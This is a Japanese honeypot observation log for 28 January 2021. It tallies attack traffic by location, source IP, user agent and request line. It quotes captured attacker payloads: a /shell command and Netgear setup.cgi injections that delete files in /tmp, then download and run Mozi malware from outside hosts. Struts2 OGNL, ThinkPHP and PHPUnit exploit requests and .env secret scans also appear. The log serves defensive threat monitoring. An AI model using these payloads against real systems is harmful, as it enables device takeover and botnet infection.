2021/01/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/01/28分です。

特徴

Location：JP

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
Nmap Scripting Engineによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location：US

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Linksys RE6500の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
を確認しました。

Location：UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
を確認しました。

Location：SG

Apache Struts2の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
13.67.44.234に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//202[.]164[.]138[.]38:49852/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：70 (前日比：-82)
US：総アクセス数：75 (前日比：+6)
UK：総アクセス数：177 (前日比：+35)
SG：総アクセス数：466 (前日比：+256)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.228.3.96	United States
5	5.8.10.202	Russia
1	5.253.84.216	New Zealand
1	13.67.53.18	United States
1	15.207.101.245	United States
1	20.52.131.71	United States
2	34.241.77.13	United States
2	35.228.83.153	United States
1	41.248.49.75	Morocco
1	43.226.153.87	China
20	45.155.205.108	Russia
3	47.104.140.112	China
3	47.116.135.220	China
1	51.103.129.12	United Kingdom
1	51.103.149.89	United Kingdom
2	51.105.58.200	United Kingdom
7	64.227.97.101	United States
3	116.62.21.254	China
1	128.14.134.134	United States
1	159.203.100.104	United States
1	161.35.181.42	United States
1	162.255.117.87	United States
1	163.172.70.88	United Kingdom
5	185.202.102.245	China
1	206.189.94.151	United States
2	209.141.60.195	United States
1	222.186.136.150	China

UserAgent一覧

件数	UserAgent
17	-
1	Anarchy99
2	Go-http-client/1.1
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
20	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36
10	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
1	python-requests/2.25.1

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
4		\x16\x03\x01
1		\x16\x03\x01\x02
1	CONNECT	ip[.]ws[.]126[.]net:443	HTTP/1.1
11	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
1	GET	/aaa9	HTTP/1.1
1	GET	/aab9	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/client_area/	HTTP/1.1
3	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/evox/about	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
3	GET	/jenkins/login	HTTP/1.0
3	GET	/login	HTTP/1.0
3	GET	/manager/html	HTTP/1.0
1	GET	/nmaplowercheck1611761843	HTTP/1.1
1	GET	/server-status	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/stalker_portal/c/	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/users/login/	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	/wp-login.php	HTTP/1.1
1	HEAD	/	HTTP/1.0\n
1	OPTIONS	/	HTTP/1.0
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/sdk	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.202.114.122	China
3	36.154.241.126	China
2	45.146.167.61	Russia
20	45.155.205.108	Russia
3	47.92.174.33	China
1	52.146.43.2	United States
1	81.190.34.173	Poland
1	91.162.206.109	France
7	104.248.198.139	United States
3	107.173.146.196	United States
1	110.177.178.51	China
1	123.13.244.133	China
1	123.58.210.35	Hong Kong
10	129.211.42.49	China
10	150.158.159.25	China
2	159.203.100.104	United States
1	161.35.181.42	United States
1	163.172.70.88	United Kingdom
1	179.43.140.169	Panama
1	185.141.241.216	Spain
1	193.118.53.194	United States
2	209.141.60.195	United States
1	222.186.136.150	China

UserAgent一覧

件数	UserAgent
16	-
3	Go-http-client/1.1
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
20	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.01694878 Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTBDFff GTB7.0
1	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
1		\x16\x03\x01
1	CONNECT	ip[.]ws[.]126[.]net:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
2	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=user&psd=user	HTTP/1.0
1	GET	/c/version.js	HTTP/1.1
1	GET	/client_area/	HTTP/1.1
4	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
3	GET	/jenkins/login	HTTP/1.0
3	GET	/login	HTTP/1.0
3	GET	/manager/html	HTTP/1.0
1	GET	/manager/html/	HTTP/1.0
2	GET	/public/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]13[.]244[.]133:38351/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/stalker_portal/c/	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//dyn[.]epicgifs[.]net/test6956.php	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/goform/webLogin	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	18.167.54.141	United States
2	34.78.126.85	United States
2	45.146.167.61	Russia
20	45.155.205.108	Russia
3	49.0.41.54	Bangladesh
1	61.219.11.153	Taiwan
2	81.71.22.99	China
2	89.248.168.108	United Kingdom
101	106.110.107.213	China
1	115.56.148.174	China
10	118.126.82.170	China
3	119.23.72.238	China
3	119.29.1.163	China
1	121.46.25.189	China
1	128.14.134.170	United States
7	134.209.47.130	United States
1	150.255.6.183	China
1	151.80.148.90	Italy
1	159.203.100.104	United States
1	161.35.181.42	United States
1	163.172.70.88	United Kingdom
1	178.128.208.90	United States
1	182.138.137.233	China
1	185.141.241.216	Spain
3	190.94.3.227	Dominican Republic
1	205.234.159.186	United States
3	209.141.60.195	United States

UserAgent一覧

件数	UserAgent
25	-
1	Go-http-client/1.1
1	Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
3	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
20	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
5	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
2		\x03
2		\x16\x03\x01
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/client_area/	HTTP/1.1
5	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
4	GET	/jenkins/login	HTTP/1.0
4	GET	/login	HTTP/1.0
4	GET	/manager/html	HTTP/1.0
1	GET	/phpMyAdmin/index.php	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
3	GET	/pmd/index.php	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]56[.]148[.]174:53932/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/stalker_portal/c/	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//dyn[.]epicgifs[.]net/test6956.php	HTTP/1.1
3	HEAD	/	HTTP/1.0
1	HEAD	/sdEA	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	23.98.134.147	United States
2	34.105.196.100	United States
1	45.146.164.179	Russia
10	45.155.205.108	Russia
3	47.111.123.200	China
2	52.152.175.55	United States
1	52.221.191.76	United States
101	58.218.121.212	China
7	68.183.214.3	United States
1	74.124.24.17	United States
1	82.202.64.37	Czechia
48	84.171.64.129	Germany
4	89.248.167.131	United Kingdom
120	93.1.154.33	France
1	115.48.194.86	China
7	121.4.45.199	China
1	128.14.134.134	United States
2	159.203.100.104	United States
1	161.35.181.42	United States
1	163.172.70.88	United Kingdom
1	178.238.8.10	United Kingdom
1	178.238.8.58	United Kingdom
2	185.142.236.40	Seychelles
1	185.174.102.44	Ukraine
1	186.33.122.147	Dominican Republic
2	194.34.133.92	Finland
3	202.75.48.19	Malaysia
1	202.164.138.38	India
33	207.180.194.90	Germany
2	209.141.60.195	United States
1	211.226.211.112	South Korea
1	217.160.40.58	Germany
1	222.186.136.150	China
101	223.10.38.107	China

UserAgent一覧

件数	UserAgent
24	-
1	Go-http-client/1.1
1	Hello, world
1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
202	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
167	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
10	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
33	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
11	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	python-requests/2.12.4

リクエスト内容一覧

件数	Method	Request	Protocol
6		-
1		\x03
2		\x16\x03\x01
1	CONNECT	ip[.]ws[.]126[.]net:443	HTTP/1.1
13	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	//%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f	HTTP/1.1
1	GET	/13.67.44.234/.env	HTTP/1.1
1	GET	/2018/.env	HTTP/1.1
1	GET	/2019/.env	HTTP/1.1
2	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest	HTTP/1.1
2	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
2	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/PMA2011/index.php?lang=en	HTTP/1.1
1	GET	/PMA2012/index.php?lang=en	HTTP/1.1
1	GET	/PMA2013/index.php?lang=en	HTTP/1.1
1	GET	/PMA2014/index.php?lang=en	HTTP/1.1
1	GET	/PMA2015/index.php?lang=en	HTTP/1.1
1	GET	/PMA2016/index.php?lang=en	HTTP/1.1
1	GET	/PMA2017/index.php?lang=en	HTTP/1.1
1	GET	/PMA2018/index.php?lang=en	HTTP/1.1
1	GET	/PMA2019/index.php?lang=en	HTTP/1.1
1	GET	/PMA2020/index.php?lang=en	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
1	GET	/admin/.env	HTTP/1.1
2	GET	/admin/db/index.php?lang=en	HTTP/1.1
2	GET	/admin/index.php?lang=en	HTTP/1.1
2	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
2	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
2	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
2	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
2	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
2	GET	/admin/web/index.php?lang=en	HTTP/1.1
1	GET	/administrator/PMA/index.php?lang=en	HTTP/1.1
1	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/db/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
1	GET	/administrator/web/index.php?lang=en	HTTP/1.1
1	GET	/api/.env	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/app/config/.env	HTTP/1.1
1	GET	/apps/.env	HTTP/1.1
1	GET	/audio/.env	HTTP/1.1
1	GET	/backend/.env	HTTP/1.1
1	GET	/base/.env	HTTP/1.1
1	GET	/blog/.env	HTTP/1.1
2	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
1	GET	/c/version.js	HTTP/1.1
1	GET	/cgi-bin/.env	HTTP/1.1
1	GET	/client_area/	HTTP/1.1
1	GET	/conf/.env	HTTP/1.1
4	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/crm/.env	HTTP/1.1
1	GET	/database/.env	HTTP/1.1
2	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/db-admin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbweb/index.php?lang=en	HTTP/1.1
2	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
2	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
2	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/webdb/index.php?lang=en	HTTP/1.1
1	GET	/db/websql/index.php?lang=en	HTTP/1.1
2	GET	/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?lang=en	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/jenkins/login	HTTP/1.0
1	GET	/laravel/.env	HTTP/1.1
1	GET	/local/.env	HTTP/1.1
2	GET	/login	HTTP/1.0
2	GET	/manager/html	HTTP/1.0
2	GET	/myadmin/index.php?lang=en	HTTP/1.1
2	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
2	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/db/index.php?lang=en	HTTP/1.1
2	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
2	GET	/mysql/index.php?lang=en	HTTP/1.1
2	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pMA/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
2	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/web/index.php?lang=en	HTTP/1.1
2	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
2	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/new/.env	HTTP/1.1
1	GET	/newsite/.env	HTTP/1.1
1	GET	/old/.env	HTTP/1.1
1	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
2	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin1/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
3	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin5/index.php?lang=en	HTTP/1.1
2	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
2	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
2	GET	/phpmy/index.php?lang=en	HTTP/1.1
2	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
202	GET	/phpmyadmin/	HTTP/1.1
2	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2017/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2018/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2020/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
2	GET	/phpmyadmin5/index.php?lang=en	HTTP/1.1
2	GET	/phppma/index.php?lang=en	HTTP/1.1
2	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/pma2011/index.php?lang=en	HTTP/1.1
1	GET	/pma2012/index.php?lang=en	HTTP/1.1
1	GET	/pma2013/index.php?lang=en	HTTP/1.1
1	GET	/pma2014/index.php?lang=en	HTTP/1.1
1	GET	/pma2015/index.php?lang=en	HTTP/1.1
1	GET	/pma2016/index.php?lang=en	HTTP/1.1
1	GET	/pma2017/index.php?lang=en	HTTP/1.1
1	GET	/pma2018/index.php?lang=en	HTTP/1.1
1	GET	/pma2019/index.php?lang=en	HTTP/1.1
1	GET	/pma2020/index.php?lang=en	HTTP/1.1
2	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/protected/.env	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//202[.]164[.]138[.]38:49852/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
2	GET	/shopdb/index.php?lang=en	HTTP/1.1
2	GET	/sitemap.xml	HTTP/1.1
1	GET	/sites/all/libraries/mailchimp/.env	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
